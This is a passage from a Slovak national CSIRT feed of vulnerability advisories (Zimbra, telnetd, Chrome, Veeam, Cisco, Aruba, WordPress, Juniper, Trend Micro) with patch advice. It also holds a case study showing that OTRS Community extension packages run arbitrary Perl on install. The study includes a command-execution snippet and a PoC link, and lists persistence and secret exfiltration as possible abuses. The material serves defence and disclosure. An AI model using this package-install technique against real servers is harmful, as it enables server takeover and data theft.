Spoločnosť ConnectWise informovala o pokusoch o zneužitie zraniteľnosti.

Možné škody:

Eskalácia oprávnení
Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia ScreenConnect aspoň na verziu 26.1.

Cloudové inštancie spoločnosť zabezpečila automaticky a netreba vykonať ďalšie kroky.

Odkazy:

Zneužívaná zraniteľnosť Zimbra Collaboration Suite dovoľuje perzistentné XSS

Marian Danko — Thu, 19 Mar 2026 12:30:20 +0000

CISA pridala do katalógu aktívne zneužívaných zraniteľností (KEV) vysoko závažnú zraniteľnosť Zimbra Collaboration Suite. CVE-2025-66376 umožňuje neautentifikovanému útočníkovi vykonávať útoky typu XSS cez e-maily vo formáte HTML.

Zraniteľné systémy:

Zimbra Collaboration Suite verzie staršej ako 10.0.18
Zimbra Collaboration Suite verzie staršej ako 10.1.13

Opis činnosti:

CVE-2025-66376 (CVSS skóre 7,2)

Organizácia CISA pridala do svojho katalógu aktívne zneužívaných zraniteľností (KEV) vysoko závažnú chybu zabezpečenia v produkte v Zimbra Collaboration Suite. Zraniteľnosť sa nachádza v komponente Classic UI a umožňuje vykonávať útoky typu uloženého/perzistentného XSS. Vzdialený neautorizovaný útočník na to môže zneužiť direktívu CSS @import pri príprave škodlivých e-mailov vo formáte HTML.

Vývojári spoločnosti Synacor zraniteľnosť opravili v novembri 2025.

Možné škody:

Únik citlivých informácií
Vzdialené vykonanie kódu

Odporúčania:

Bezodkladná aktualizácia Zimbra Collaboration Suite aspoň na verziu 10.0.18 alebo 10.1.13.

Odkazy:

https://www.cisa.gov/known-exploited-vulnerabilities-catalog

Kritická zraniteľnosť GNU InetUtils telnetd umožňuje vzdialené vykonanie kódu

Marian Danko — Thu, 19 Mar 2026 12:28:19 +0000

Bezpečnostní výskumníci zverejnili informácie o kritickej zraniteľnosti v GNU InetUtils telnetd. CVE-2026-32746 sa nachádza v handleri LINEMODE SLC (Set Local Characters) a umožňuje zápis do pamäte mimo povolených hodnôt.

Zraniteľné systémy:

GNU InetUtils telnetd vo verzii 2.7 a staršie

Opis zraniteľnosti:

CVE-2026-32746 (CVSS skóre: 9,8)

Kritická zraniteľnosť s označením CVE-2026-32746 sa nachádza v handleri LINEMODE SLC (Set Local Characters). Súvisí s pretečením vyrovnávacej pamäte kvôli chýbajúcej kontrole jej obsadenia vo funkcii add_slc a umožňuje zápis do pamäte mimo povolených hodnôt. Vzdialený neautentifikovaný útočník ju môže zneužiť zaslaním špeciálne vytvorených správ počas fázy inicializovania pripájania (handshake) pred aktivovaním prihlasovacieho okna. Tým získa možnosť vzdialene vykonať kód s oprávneniami používateľa root a môže získať úplnú kontrolu nad systémom.

Na uvedenú zraniteľnosť je dostupný proof-of-concept kód demonštrujúci mechanizmus jej zneužitia.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia oprávnení
Narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Bezpečnostné aktualizácie by mali byť dostupné najneskôr 1. apríla 2026. Do vydania aktualizácií odporúčame zraniteľnosť mitigovať limitovaním prístupu cez telnet len na zoznam dôveryhodných IP adries, prípadne úplné blokovanie komunikácie na port 23 alebo deaktiváciu telnetd, ak nie je využívaná.

Zdroje:

Apple opravila zraniteľnosť komponentu WebKit umožňujúcu obídenie politiky Same Origin

Marian Danko — Thu, 19 Mar 2026 12:26:42 +0000

Spoločnosť Apple vydala bezpečnostné aktualizácie svojich operačných systémov iOS, iPadOS a macOS, ktoré opravujú zraniteľnosť komponentu WebKit. Zraniteľnosť spočíva v chybe mechanizmu CORS, ktorá vyplýva z nedostatočného overovania vstupov v rámci Navigation API.

Zraniteľné systémy:

Zariadenia s operačným systémom verzie iOS 26.3.1
Zariadenia s operačným systémom verzie iPadOS 26.3.1
Zariadenia s operačným systémom verzie macOS 26.3.1
Zariadenia s operačným systémom verzie macOS 26.3.2

Opis zraniteľnosti:

CVE-2026-20643 (CVSS skóre: 5,4)

Zraniteľnosť s označením CVE-2026-20643 sa nachádza v komponente WebKit a spočíva v chybnom nastavení mechanizmu CORS, resp. nedostatočnom overovaní vstupov v rámci Navigation API. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na obídenie politiky Same Origin.

Spoločnosť Apple zraniteľnosť opravila záplatou cez službu Background Security Improvements, pri ktorej inštalácii sa po vzore Microsoft HotPatch nevyžaduje reštart zariadenia. Ide o zdôraznenie potreby operatívneho aktualizovania za účelom rýchlej reakcie na hrozby a zraniteľnosti. Apple uviedla, že sa zároveň jedná o prvú aktualizáciu vydanú týmto spôsobom.

Možné škody:

Kompromitácia zariadenia
Únik citlivých údajov

Odporúčania:

Spoločnosť Apple odporúča využiť službu Background Security Improvements na bezodkladnú aktualizáciu operačných systémov iOS, iPadOS a macOS. Zapnúť ju možno v aplikácii Settings v časti Privacy and Security.

Pokiaľ danú službu nechcete využiť, zraniteľnosti opraví spoločnosť v nasledujúcej aktualizácii zasiahnutých operačných systémov.

Zdroje:

Zero-day zraniteľnosti Google Chrome

Marian Danko — Mon, 16 Mar 2026 13:07:43 +0000

Spoločnosť Google vydala bezpečnostné aktualizácie svojho webového prehliadača Chrome, ktoré opravujú dve aktívne zneužívané vysoko závažné zraniteľnosti. Neautorizovanému útočníkovi po ich zneužití umožňujú zapisovať do pamäte a vzdialene vykonávať kód.

Zraniteľné systémy:

Google Chrome pre Windows verzie staršej ako 146.0.7680.75/76
Google Chrome pre Mac verzie staršej ako 146.0.7680.75/76
Google Chrome pre Linux verzie staršej ako 146.0.7680.75

Opis činnosti:

Vývojári spoločnosti Google opravili dve aktívne zneužívané zero-day zraniteľnosti v internetovom prehliadači Chrome.

CVE-2026-3909 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť sa nachádza v grafickej knižnici Skia. Vyplýva z možnosti zapisovania do pamäte mimo povolené hodnoty. Vzdialený neautorizovaný útočník ju môže zneužiť pomocou špeciálne vytvorenej webstránky.

CVE-2026-3910 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť sa nachádza v nástroji V8. Vyplýva z nešpecifikovanej nevhodnej implementácie. Vzdialený neautorizovaný útočník ju môže zneužiť pomocou špeciálne vytvorenej webstránky, čím získa možnosť vykonávať ľubovoľný kód v sandboxe prehliadača.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia Chrome pre Windows a Mac aspoň na verziu 146.0.7680.75/76 a Linux aspoň na verziu 146.0.7680.75.

Odkazy:

Veeam opravuje viaceré kritické zraniteľnosti produktu Backup & Replication

Marian Danko — Mon, 16 Mar 2026 13:05:58 +0000

Spoločnosť Veeam vydala bezpečnostné aktualizácie zálohovacieho riešenia Backup & Replication, ktoré opravujú 7 zraniteľností, z čoho 5 je označených ako kritické. Vzdialenému autentifikovanému útočníkovi umožňujú vykonávanie kódu, obídenie bezpečnostných prvkov a manipuláciu so súbormi, eskaláciu privilégií a získanie prihlasovacích údajov.

Zraniteľné systémy:

Veeam Backup & Replication 12.3.2.4165 a staršie verzie 12.x.x.x
Veeam Backup & Replication 13.0.1.1071 a staršie verzie 13.x.x.x

Opis činnosti:

CVE-2026-21666, CVE-2026-21667, CVE-2026-21669 (CVSS skóre 9,9)

Kritické zraniteľnosti komponentu Backup Server umožňujú autentifikovanému doménovému používateľovi vzdialene vykonávať kód.

CVE-2026-21668 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť komponentu Backup Repository umožňuje autentifikovanému doménovému používateľovi obísť zabezpečenie a manipulovať s ľubovoľnými súbormi.

CVE-2026-21670 (CVSS skóre 7,7)

Vysoko závažná zraniteľnosť umožňujúca útočníkovi s nízkymi oprávneniami získať prihlasovacie údaje k SSH.

CVE-2026-21671 (CVSS skóre 9,1)

Kritická zraniteľnosť inštancií Backup & Replication s vysokou dostupnosťou (HA) umožňuje autentifikovanému doménovému používateľovi s oprávneniami Backup Administrator vzdialene vykonávať kód.

CVE-2026-21672 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť Windowsových serverov Backup & Replication umožňuje lokálnemu útočníkovi navýšenie oprávnení.

CVE-2026-21708 (CVSS skóre 9,9)

Kritická zraniteľnosť komponentu umožňuje útočníkovi s rolou Backup Viewer vzdialene vykonávať kód v kontexte používateľa postgres.

Možné škody:

Vzdialené vykonávanie kódu
Obchádzanie bezpečnostných prvkov
Únik citlivých informácií
Eskalácia privilégií

Odporúčania:

Bezodkladná aktualizácia Veeam Backup & Replication aspoň na verziu 12.3.2.4465 alebo 13.0.1.2067.

Odkazy:

Kritická zraniteľnosť v HPE Aruba Networking AOS-CX umožňuje reset administrátorského hesla

Marian Danko — Fri, 13 Mar 2026 15:25:44 +0000

Spoločnosť HPE (Hewlett Packard Enterprise) vydala balík aktualizácií operačného systému prepínačov série Aruba CX, ktorý okrem iných opravuje jednu kritickú zraniteľnosť. CVE‑2026‑23813 umožňuje útočníkovi bez akýchkoľvek prihlasovacích údajov obísť autentifikáciu webového manažmentového rozhrania.

Zraniteľné systémy:

AOS-CX vo verzii 10.17.0001 a starších
AOS-CX vo verzii 10.16.1020 a starších
AOS-CX vo verzii 10.13.1160 a starších
AOS-CX vo verzii 10.10.1170 a starších

Opis zraniteľností:

CVE‑2026‑23813 (CVSS 3.1 skóre 9,8)

Kritická bezpečnostná zraniteľnosť vo webovom manažmentovom rozhraní prepínačov Aruba CX, v systéme AOS-CX, umožňuje vzdialenému útočníkovi obísť autentifikačný mechanizmus zariadenia. V niektorých prípadoch môže viesť k resetu administrátorského hesla, čím môže útočník získať plný prístup a úplnú kontrolu nad systémom.

Možné škody:

Obídenie bezpečnostných prvkov
Eskalácia privilégií
Neoprávnená zmena v systéme

Odporúčania:

Administrátorom sa odporúča čo najskôr vykonať aktualizáciu zasiahnutých systémov aspoň na verziu:

AOS-CX vo verzii 10.17.1001
AOS-CX vo verzii 10.16.1030
AOS-CX vo verzii 10.13.1161
AOS-CX vo verzii 10.10.1180

Ak aktualizáciu nie je možné realizovať, zraniteľnosť je možné zmierniť obmedzením prístupu k manažmentovému rozhraniu zariadení len z dôveryhodných zdrojov a deaktivováciou rozhraní HTTP(S) na SVI (Switched Virtual Interfaces) a na routovaných portoch, kde nie je potrebný manažmentový prístup. Zároveň je vhodné nastaviť kontrolu prístupov (Control Plane Access Control List) pre manažmentové rozhrania REST/HTTP. Odporúča sa tiež zaviesť logovanie a priebežné monitorovanie aktivity zariadení.

Zdroj:

Kritická zraniteľnosť modulu WordPress User Registration & Membership

Marian Danko — Fri, 06 Mar 2026 16:07:59 +0000

Spoločnosť WPEverest vydala bezpečnostnú aktualizáciu svojho modulu User Registration & Membership pre WordPress, ktorá opravuje aktívne zneužívanú kritickú zraniteľnosť CVE-2026-1492. Vzdialený neautentifikovaný útočník ju môže zneužiť na vytvorenie administrátorského účtu.

Zraniteľné systémy:

User Registration & Membership pre WordPress, verzia 5.1.2 a staršie

Opis činnosti:

CVE-2026-1492 (CVSS skóre 9,8)

Kritická chyba modulu User Registration & Membership pre WordPress vyplýva z nevhodného manažmentu oprávnení. Používateľ môže pri registrácii zadať svoju rolu, ktorú systém akceptuje bez overenia na strane servera. Neautentifikovaný útočník si tak môže vytvoriť účet s administrátorskými oprávneniami, s ktorým môže napríklad vykonávať zmeny na webstránke, pristupovať k jej databázam, inštalovať moduly, zasahovať do PHP kódu, či meniť bezpečnostné nastavenia.

Spoločnosť Defiant informovala o aktívnom zneužívaní zraniteľnosti.

Možné škody:

Eskalácia oprávnení
Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia modulu User Registration & Membership pre WordPress aspoň na verziu 5.1.3.

Taktiež odporúčame vykonať audit používateľských kont kvôli prítomnosti neautorizovaných účtov, prípadne logoch kvôli stopám poukazujúcim na pokus o zneužitie zraniteľnosti.

Odkazy:

Závažné zraniteľnosti Cisco Catalyst SD‑WAN Manager

Marian Danko — Fri, 06 Mar 2026 16:04:26 +0000

Spoločnosť Cisco opravila 5 závažných zraniteľností v Catalyst SD‑WAN Manager. Tieto útočníkom umožňujú manipulovať so súbormi, získavať informácie, obchádzať prihlásenie, či eskalovať svoje oprávnenia. Cisco potvrdila, že útočníci aktívne zneužívajú dve z opravených zraniteľností.

Zraniteľné systémy:

Cisco Catalyst SD-WAN Manager staršie ako 20.9
Cisco Catalyst SD-WAN Manager 20.9, verzie staršie ako 20.9.8.2
Cisco Catalyst SD-WAN Manager 20.11 a 20.12, verzie staršie ako 20.12.5.3 a 20.12.6.1
Cisco Catalyst SD-WAN Manager 20.13, 20.14, 20.15, verzie staršie ako 20.15.4.2
Cisco Catalyst SD-WAN Manager 20.16, 20.18, verzie staršie ako 20.18.2.1

Opis činnosti:

CVE-2026-20122 (CVSS skóre 7,1)

Zraniteľnosť v rozhraní API súvisiaca so spôsobom narábania so súbormi. Vzdialený autentifikovaný útočník s oprávneniami „read-only“ ju môže zneužiť na prepísanie ľubovoľných súborov na lokálnom súborovom systéme a získanie oprávnení „vmanage“. Na to potrebuje nahrať do systému škodlivý súbor.

Zraniteľnosť je aktívne zneužívaná.

CVE-2026-20126 (CVSS skóre 7,8)

Zraniteľnosť autentifikačného mechanizmu REST API umožňuje navýšiť oprávnenia na úroveň používateľa root. Autentifikovaný útočník s nízkymi oprávneniami ju môže zneužiť zaslaním špeciálne vytvorenej požiadavky na REST API.

CVE-2026-20128 (CVSS skóre 5,5)

Zraniteľnosť v komponente Data Collection Agent (DCA) vyplýva z prítomnosti súboru s prihlasovacími údajmi pre používateľa DCA v systéme. Lokálny autentifikovaný útočník s oprávneniami „vmanage“ tak môže získať oprávnenia DCA.

Zraniteľnosť je aktívne zneužívaná.

CVE-2026-20129 (CVSS skóre 9,8)

Zraniteľnosť súvisiaca s nevhodnou autentifikáciou požiadaviek na rozhranie API. Vzdialený neautentifikovaný útočník dokáže jej zneužitím vykonávať príkazy s oprávneniami používateľa „netadmin“.

CVE-2026-20133 (CVSS skóre 7,5)

Zraniteľnosť vyplývajúca z nedostatočných obmedzení prístupu k súborovému systému. Vzdialený neautentifikovaný útočník získa po jej zneužití cez rozhranie API možnosť čítať citlivé informácie zo systému.

Možné škody:

Únik citlivých informácií
Eskalácia oprávnení
Obídenie bezpečnostného prvku

Odporúčania:

Bezodkladná aktualizácia Cisco Catalyst SD-WAN Manager aspoň na verziu 20.9.8.2, 20.12.5.3, 20.12.6.1, 20.15.4.2 alebo 20.18.2.1.

Odkazy:

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v

Kritické zraniteľnosti v Cisco Secure FMC a SCC umožňujú vzdialené vykonanie kódu

Marian Danko — Fri, 06 Mar 2026 16:02:46 +0000

Spoločnosť Cisco vydala bezpečnostné aktualizácie nástroja pre manažment firewallov Secure Firewall Management Center (FMC) a Security Cloud Control (SCC) Firewall Management, ktoré opravujú 2 kritické zraniteľnosti umožňujúce obídenie prihlásenia, eskaláciu oprávnení a vzdialené vykonanie kódu.
[Aktualizácia 19.3.2026] jedna zo zraniteľností bola zneužívaná ako zero-day od januára.

Zraniteľné systémy:

Cisco Secure Firewall Management Center (FMC) 6.4.0.13 staršie ako 7.0.9
Cisco Secure Firewall Management Center (FMC) 7.0.0 staršie ako 7.0.9
Cisco Secure Firewall Management Center (FMC) 7.1.0 staršie ako 7.2.11
Cisco Secure Firewall Management Center (FMC) 7.3.0 staršie ako 7.4.6
Cisco Secure Firewall Management Center (FMC) 7.6.0 staršie ako 7.6.5
Cisco Secure Firewall Management Center (FMC) 7.7.0 staršie ako 7.7.12
Cisco Secure Firewall Management Center (FMC) 10.0.0 staršie ako 10.0.1
Cisco Security Cloud Control (SCC) Firewall Management

Opis zraniteľnosti:

CVE-2026-20079 (CVSS 3.1 skóre 10.0)

Kritická zraniteľnosť CVE-2026-20079 spočíva v existencii nesprávneho systémového procesu, ktorý sa vytvorí pri bootovaní zariadenia. Vzdialený neautentifikovaný útočník by ju mohol zneužiť zaslaním špeciálne vytvorených HTTP požiadaviek na obídenie autentifikácie a vykonanie skriptov a príkazov umožňujúcich získanie administrátorského prístupu do systému.

CVE-2026-20131 (CVSS 3.1 skóre 10.0)

Kritická zraniteľnosť s označením CVE-2026-20131 spočíva v nezabezpečenej deserializácii používateľských vstupov. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu Java s oprávneniami používateľa root. Na to potrebuje poslať špeciálne vytvorený serializovaný objekt Java na webové manažmentové rozhranie zraniteľného zariadenia.

[Aktualizácia 19.3.2026]
Ransomvérová skupina Interlock aktívne zneužívala kritickú zero-day zraniteľnosť CVE-2026-20131 v softvéri Cisco Secure Firewall Management Center už od konca januára 2026, približne mesiac pred jej zverejnením a opravou.

Možné škody:

Vzdialené vykonanie kódu
Obídenie bezpečnostných prvkov
Eskalácia oprávnení

Odporúčania:

Výrobca administrátorom odporúča bezodkladnú aktualizáciu zraniteľných verzií Cisco Secure Firewall Management Center (FMC) aspoň na verzie 7.0.9, 7.2.11, 7.4.6, 7.6.5, 7.7.12 alebo 10.0.1.

Zraniteľnosti v službe Cisco Security Cloud Control (SCC) Firewall Management opravila spoločnosť automaticky.

Zdroje:

Keď z administrátorských funkcií vznikne RCE: prípadová štúdia OTRS Community Package Design

Marian Danko — Thu, 05 Mar 2026 14:22:32 +0000

Bezpečnostní analytici CSIRT.SK objavili chybu v dizajne tiketovacieho systému OTRS Community. Táto bezpečnostná chyba umožňuje vykonávanie ľubovoľného kódu.

Úvod

Väčšina moderných webových aplikácií funguje na základe predpokladu, že nikomu nemožno úplne dôverovať, ani administrátorom. Niektoré architektonické rozhodnutia však administrátorom stále poskytujú možnosti, ktoré efektívne stierajú hranicu medzi správou a vykonávaním ľubovoľného kódu.

V tomto príspevku budem analyzovať rozhodnutie týkajúce sa dizajnu v tiketovacom nástroji OTRS Community: možnosť administrátorov inštalovať balíky rozšírení (.opm), ktoré môžu počas inštalácie vykonávať ľubovoľný kód Perl.

Nejedná sa o zraniteľnosť v klasickom zmysle. Neexistuje žiadne obídenie overovania, žiadna chyba umožňujúca injektovanie a žiadny únik zo sandboxu.

Je to však nebezpečný dizajnový vzorec, ktorý mení prístup administrátora na vykonávanie príkazov na serveri, pričom operátori si často neuvedomujú bezpečnostné dôsledky.

Príklad demonštrujúci toto správanie (PoC) si môžete pozrieť v mojom repozitári GitHub: [OTRS Community PoC Repository]
(https://github.com/Habuon/exploits/tree/main/otrs)

Pozadie: OTRS Community Package Management

OTRS Community podporuje formát balíkov (.opm), ktoré slúžia na rozšírenie systému o nové funkcie. Tieto balíky môžu definovať logiku inštalácie pomocou blokov :

```xml use strict; use warnings; # arbitrary Perl code ]]> ```

Tento kód sa automaticky vykoná, keď správca nainštaluje balík prostredníctvom webového rozhrania.

Z hľadiska funkčnosti to dáva zmysel:

Balíky musia modifikovať konfiguráciu
Môžu potrebovať inštalovať súbory
Môžu potrebovať interagovať so systémom

Z hľadiska bezpečnosti to však znamená:

Inštalácia balíka = vykonanie ľubovoľného kódu na strane servera.

Detaily konceptu

Škodlivý balík môže do svojej inštalačnej rutiny vložiť vykonanie príkazov operačného systému:

```perl my $content = `id`; ```

Tento príkaz sa vykonáva v kontexte používateľa spúšťajúceho službu OTRS Community.

S minimálnym kódom dokáže:

Vykonávať ľubovoľné príkazy shellu
Zapisovať výstup do koreňového adresára webu
Vytvoriť perzistenciu
Exfiltrovať tajomstvá
Nasadzovať zadné vrátka

Ukážkový kód Python (PoC) automatizuje tento proces:

Prihlásením sa ako správca
Nahratím upraveného súboru .opm
Spustením inštalácie
Načítaním výstupu príkazu

Úplný ukážkový kód si môžete pozrieť v mojom repozitári GitHub tu: [OTRS Community PoC Repository]
(https://github.com/Habuon/exploits/tree/main/otrs)

Nie sú potrebné žiadne reťazce exploitov. Žiadne poškodenie pamäte. Žiadna chyba deserializácie. Len zamýšľaná funkcia.

Prečo to nie je CVE

Toto správanie je:

Autentifikované
Zamýšľané
Súčasťou dizajnu systému

Preto podľa väčšiny definícií nejde o zraniteľnosť.

„Nie je to zraniteľnosť“ však neznamená „bezpečný dizajn“.

Dopad na bezpečnosť

Tento dizajn spôsobuje zrútenie vrstiev privilégií:

Vrstva	Zamýšľané
Webový administrátor	Kontrola aplikácie
Systémový používateľ	Exekúcia na úrovni OS

Tým, že umožňujú vykonávanie ľubovoľného kódu v rámci rutiny inštalácie balíka, sa tieto dve vrstvy stávajú ekvivalentnými.

V praxi to znamená:

Kompromitovanie administrátora OTRS Community = kompromitovanie servera.

Tým sa porušuje kľúčový bezpečnostný princíp:

Administrátorské oprávnenie ≠ vykonávanie ľubovoľného kódu.

Porovnanie s inými platformami

Moderné modulové systémy (WordPress, prehliadače, IDE) čoraz viac:

Obmedzujú rozšírenia (sandboxing)
Obmedzujú prístup k súborovému systému
Zakazujú hooky na vykonávanie surového kódu
Používajú deklaratívne kroky inštalácie

Model OTRS Community má bližšie k:

„Spustite tento skript Perl ako súčasť inštalácie.“

Čo je výkonné, ale extrémne nebezpečné.

Získané poučenie

Podpísané alebo dôveryhodné rozšírenia nie sú štandardne bezpečné – dôvera by sa mala minimalizovať, nie maximalizovať.
Administrátorské panely by nemali byť shellovými rozhraniami – účet webového administrátora by nemal implicitne povoľovať vykonávanie príkazov operačného systému.
Systémy rozšírení by mali byť deklaratívne, nie imperatívne – inštalácia by mala popisovať, čo treba urobiť, nie ako vykonávať kód.
Dopad po overení je dôležitý – mnohé kompromitácie začínajú odcudzením prihlasovacích údajov.

Odporúčanie pre obranu

Ak prevádzkujete inštanciu OTRS: Community

Prísne obmedzte administrátorské účty
Kompromitáciu administrátorského účtu považujte za úplnú kompromitáciu servera
Nevystavujte administrátorské rozhranie OTRS Community do verejného internetu
Používajte izoláciu na úrovni operačného systému (kontajnery, chroot, SELinux, AppArmor)
Monitorujte aktivitu inštalácie balíkov
Zvážte použitie súborového systému len na čítanie pre webové procesy, kde je to možné

Záver

Táto prípadová štúdia sa netýka zraniteľnosti. Týka sa voľby dizajnu, ktorá vedie k nebezpečnému narušeniu bezpečnostných princípov.

Keď systémy rozšírení umožňujú vykonávanie ľubovoľného kódu počas inštalácie, správcovia už nie sú len správcami – stávajú sa používateľmi shellu.

V kontrolovaných prostrediach to môže byť prijateľné, ale malo by to byť explicitne dané a zrozumiteľné riziko.

Najnebezpečnejšie chyby nie sú niekedy vôbec chybami – sú to funkcie.

Mesačný prehľad kritických zraniteľností február 2026

Marian Danko — Tue, 03 Mar 2026 15:01:24 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci február 2026.

Mesačný prehľad – 02/2026 PDF (606 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Kritická zraniteľnosť Junos OS Evolved dovoľuje vykonávať kód ako root

Marian Danko — Mon, 02 Mar 2026 10:27:03 +0000

Spoločnosť Juniper Networks opravila kritickú zraniteľnosť platformy On-Box Anomaly Detection vo svojich routeroch série PTX. Zraniteľnosť umožňuje bez autentifikácie vzdialene vykonávať kód s oprávneniami používateľa root.

Zraniteľné systémy:

Junos OS Evolved 25.4 PTX Series staršie ako 25.4R1-S1-EVO, 25.4R2-EVO

Opis činnosti:

CVE-2026-21902 (CVSS v4.0 skóre 9,3)

Spoločnosť Juniper Networks vydala bezpečnostné aktualizácie pre kritickú zraniteľnosť Junos OS Evolved PTX Series. Chyba zabezpečenia sa nachádza v súčasti On-Box Anomaly Detection a súvisí s nevhodným prideľovaním oprávnení. Neautentifikovanému útočníkovi umožňuje vzdialene vykonávať kód s oprávneniami používateľa root.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia Junos OS Evolved 25.4 PTX Series aspoň na verziu 25.4R1-S1-EVO, 25.4R2-EVO alebo 26.2R1-EVO.

Pre mitigovanie zraniteľnosti povoľte prístup k On-Box Anomaly Detection len z dôveryhodných sietí a zariadení, prípadne zakážte službu príkazom „request pfe anomalies disable“.

Odkazy:

Riešenie advanced endpoint security od TrendAI obsahuje kritické zraniteľnosti

Dávid Polakovič — Mon, 02 Mar 2026 10:25:55 +0000

Spoločnosť TrendAI (nové meno vetvy spoločnosti Trend Micro enterprise business) vydalo bezpečnostné aktualizácie pre svoje riešenie advanced endpoint security Apex One. Tie opravujú 8 zraniteľností z ktorých 2 sú vyhodnotené ako kritické.

Zraniteľné systémy:

Apex One 2019 (On-prem) pre Windows
Apex One SaaS pre Windows
Trend Vision One Endpoint – Standard Endpoint Protection SaaS pre Windows
Apex One SaaS pre Mac

Opis zraniteľnosti:

CVE-2025-71210 (CVSS 3 skóre 9,8)

Zraniteľnosť v správcovskej konzole Trend Micro Apex One umožňuje neprivilegovaným útočníkom prechádzať cestami, nahrať a spustiť škodlivý kód. Pre jej zneužitie potrebuje útočník prístup ku konzole.

CVE-2025-71211 (CVSS 3 skóre 9,8)

Zraniteľnosť rovnakého typu ako CVE-2025-71210 ale pre odlišný spustiteľný súbor správcovskej konzoly Trend Micro Apex One.

CVE-2025-71212 (CVSS 3 skóre 7,8)

Zraniteľnosť typu link following v skenovacom prvku riešenia Trend Micro Apex One umožňuje lokálnemu útočníkovi eskalovať oprávnenia.

CVE-2025-71213 (CVSS 3 skóre 7,8)

Zraniteľnosť spôsobená chybou validácie pôvodu v riešení Trend Micro Apex One môže umožniť lokálnemu útočníkovi eskalovať oprávnenia.

CVE-2025-71214 (CVSS 3 skóre 7,2)

Zraniteľnosť spôsobená chybou validácie pôvodu v službe iCore agenta Trend Micro Apex One pre macOS dovoľuje lokálnemu útočníkovi eskalovať oprávnenia.

CVE-2025-71215 (CVSS 3 skóre 7,8)

Zraniteľnosť typu time-of-check to time-of-use (TOCTOU) pri overovaní podpisu v službe iCore agenta Trend Micro Apex One pre Mac umožňuje lokálnemu útočníkovi eskalovať oprávnenia.

CVE-2025-71216 (CVSS 3 skóre 7,8)

Zraniteľnosť typu time-of-check to time-of-use (TOCTOU) v mechanizme vyrovnávacej pamäte agenta Trend Micro Apex One pre Mac môže umožniť lokálnemu útočníkovi eskalovať oprávnenia.

CVE-2025-71217 (CVSS 3 skóre 7,8)

Zraniteľnosť spôsobená chybou validácie pôvodu v mechanizme sebaochrany agenta Trend Micro Apex One pre Mac dovoľuje lokálnemu útočníkovi eskalovať oprávnenia.

Zraniteľnosti CVE-2025-71212 až CVE-2025-71217 vyžadujú pre zneužitie schopnosť vykonávať kód s nízkymi oprávneniami.

Možné škody:

Vzdialené vykonávanie kódu
Eskalácia privilégií
Narušenie dôveryhodnosti systému
Únik citlivých dát a informácií

Odporúčania:

Systémovým administrátorom odporúčame bezodkladne aplikovať bezpečnostné aktualizácie (Critical Patch Build 14136 pre riešenia on-prem a Security Agent Build 14.0.20315 pre SaaS), dostupné priamo v aplikácii výrobcu. Zároveň sa odporúča pred každou aktualizáciou preveriť nutnosť inštalácie dodatočného softvéru (ako napríklad servisných balíčkov) priamo na stránke výrobcu v sekcii „Download Center“.

Zákazníci, ktorí majú IP adresu svojej konzoly vystavenú do verejného prostredia, by mali zvážiť zavedenie nápravných opatrení, ako sú napríklad obmedzenia zdrojových adries.

Zdroje:

Kritická zraniteľnosť Cisco Catalyst SD-WAN Controller/Manager

Marian Danko — Mon, 02 Mar 2026 10:23:24 +0000

Spoločnosť Cisco opravila kritickú zraniteľnosť vo svojom produkte Catalyst SD-WAN Controller/Manager. Chybu zabezpečenia aktívne zneužívajú útočníci na obídenie autentifikácie a získanie prístupu ku konfiguračnému rozhraniu.

Zraniteľné systémy:

Cisco Catalyst SD-WAN Controller a Manager verzií starších ako 20.9.8.2, 20.12.5.3, 20.12.6.1, 20.15.4.2 a 20.18.2.1

Opis činnosti:

CVE-2026-20127 (CVSS skóre 10,0)

Aktívne zneužívaná kritická zraniteľnosť Cisco Catalyst SD-WAN Controller / Manager sa nachádza v autentifikačnom mechanizme. Vzdialenému útočníkovi umožňuje obísť autentifikáciu a získať administrátorské oprávnenia pomocou špeciálne vytvorených požiadaviek, ktoré pošle na zraniteľný systém. Po získaní prístupu do účtu môže následne pristupovať ku konfiguračnému rozhraniu siete NETCONF.

Možné škody:

Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia Cisco Catalyst SD-WAN na verziu 20.9.8.2, 20.12.5.3, 20.12.6.1, 20.15.4.2, alebo 20.18.2.1.

Ak aktualizáciu nie je možné vykonať v krátkom čase, zraniteľnosť na lokálne nasadených inštanciách je možné dočasne mitigovať nasadením kontroly prístupov (ACL), skupinových bezpečnostných pravidiel a obmedziť prístup na port 22 a 830 iba z dôveryhodných IP adries. Výrobca tiež odporúča nakonfigurovať zariadenia podľa jeho manuálu.

Vzhľadom na možné zneužitie zraniteľnosti odporúčame preveriť podozrivé prihlásenia, zaznamenané relácie z podozrivých IP adries, a podobne.

Odkazy:

Mesačná správa CSIRT.SK – január 2026

Marian Danko — Mon, 23 Feb 2026 15:06:24 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci január 2026. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 01/2026 PDF (1 730 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Kritické zraniteľnosti v rozšíreniach Visual Studio Code umožňujú vykonávať kód a exfiltrovať dáta

Marian Danko — Mon, 23 Feb 2026 15:03:26 +0000

Výskumníci zo spoločnosti Ox Security identifikovali viaceré závažné zraniteľnosti v populárnych rozšíreniach pre Visual Studio Code (VSCode). Útočníci ich môžu zneužiť na kradnutie lokálnych súborov a vzdialené vykonávanie kódu priamo v prostredí vývojára.

Zraniteľné systémy:

